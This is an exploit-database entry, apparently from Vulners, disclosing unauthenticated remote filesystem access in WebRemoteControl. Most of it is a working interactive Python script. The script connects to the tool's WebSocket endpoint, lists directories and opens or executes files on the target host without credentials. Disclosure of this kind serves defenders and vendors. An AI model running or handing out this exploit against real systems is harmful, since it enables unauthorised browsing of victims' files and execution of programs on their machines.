📄 WebRemoteControl Unauthenticated Remote Filesystem Access

🗓️ 14 Apr 2026 00:00:00Reported by Chokri HammediType

WebRemoteControl exposes unauthenticated web socket access to remote filesystem.

# Exploit Title: WebRemoteControl - Unauthenticated Remote Filesystem Access
    # Date: 2026-04-14
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/wolfgangasdf/WebRemoteControl
    # Software Link:
    https://github.com/wolfgangasdf/WebRemoteControl/releases/download/SNAPSHOT/webremotecontrol-windows-x64.zip
    # Version: SNAPSHOT
    # Tested on: Windows 10/11
    
    
    #!/usr/bin/env python3
    
    import websocket, time
    
    ws = websocket.create_connection("ws://172.16.126.135:8000/docs/cmd",
    timeout=5)
    ws.recv()
    
    def list_files():
        ws.send("fbgetfiles")
        time.sleep(0.5)
        resp = ws.recv()
        parts = resp.split("\t")
        if parts[0] == "fblist":
            print(f"\n[PATH] {parts[1]}")
            for i, item in enumerate(parts[2:]):
                print(f"  {i}: {item}")
        else:
            print("[!] Failed to list files")
    
    def open_item(idx):
        ws.send(f"fbopen\t{idx}")
        time.sleep(0.5)
        resp = ws.recv()
        if resp.startswith("fblist"):
            parts = resp.split("\t")
            print(f"[+] Opened folder: {parts[1]}")
        else:
            print("[+] File executed on host")
    
    def go_up():
        ws.send("fbup")
        time.sleep(0.5)
        ws.recv()
    
    print("""
    === WebRemoteControl File Browser Exploit ===
    Commands:
      list    - show current directory contents
      open X  - open folder or file at index X
      up      - go to parent directory
      exit    - quit
    
    Example:
      > list
      > open 14
      > list
      > open 3
      > list
      > up
      > list
    """)
    
    while True:
        cmd = input("> ").strip().lower()
        if cmd == "list":
            list_files()
        elif cmd.startswith("open"):
            try:
                open_item(int(cmd.split()[1]))
            except:
                print("Usage: open <number>")
        elif cmd == "up":
            go_up()
        elif cmd == "exit":
            break
        else:
            print("Commands: list, open <num>, up, exit")
    
    ws.close()

14 Apr 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8